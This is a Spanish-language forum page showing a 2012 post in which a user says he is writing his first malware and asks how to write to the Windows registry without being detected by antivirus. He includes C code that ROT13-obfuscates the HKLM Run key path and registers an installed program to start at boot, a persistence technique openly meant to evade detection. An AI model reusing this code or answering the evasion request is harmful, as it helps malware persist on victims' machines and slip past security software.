Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - dlqlplb

Páginas: [1]
1
Dudas y pedidos generales / [SOLUCIONADO] Duda entrada en el registro
« en: Junio 28, 2012, 09:25:48 pm »
Estoy empezando a programar mi primer malware, y me he topado con un detalle al momento de escribir en el registro de windows, estoy usando una funcion muy vieja  que encontre y es por eso que el antivirus me lo detecta muy rapido.
 quisiera saber que metodos o formas de escribir en el registro puedo usar para no ser detectado ta rapido?
 tengo entendido que se puede usar el cifrado XOR!
Tienen algun ejemplo?

       
Código: C
  1.        HKEY startup;
  2.         char key[256];          
  3.         k(key,"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
  4.         RegCreateKeyEx(HKEY_LOCAL_MACHINE , key, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &startup, NULL);
  5.         RegSetValueEx(startup, regname, 0, REG_SZ, (BYTE *)installpath, strlen(installpath));          
  6.         RegCloseKey(startup);
  7.      
lib.h
     
Código: C
  1. #define WIN32_LEAN_AND_MEAN
  2. #include <windows.h>
  3. #include <string.h>
  4.  
  5.  
  6. char k1(char c);
  7. void k(char *buf, const char *in);
  8.  
  9. char *xstrchr(const char *str, char ch);
  10.  
  11.  
  12. char k1(char c)
  13. {
  14. char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
  15. char l[] = "abcdefghijklmnopqrstuvwxyz";
  16. char *p;
  17.  
  18. if ((p = xstrchr(u, c)) != NULL)
  19. return u[((p-u) + 13) % 26];
  20. else if ((p = xstrchr(l, c)) != NULL)
  21. return l[((p-l) + 13) % 26];
  22. else
  23. return c;
  24. }
  25.  
  26. void k(char *buf, const char *in)
  27. {
  28. while (*in)
  29. *buf++ = k1(*in++);
  30. *buf = 0;
  31. }
  32.  
  33. char *xstrchr(const char *str, char ch)
  34. {
  35. while (*str && *str != ch) str++;
  36. return (*str == ch) ? (char *)str : NULL;
  37. }
  38.  
  39.  
  40.      


c++

Páginas: [1]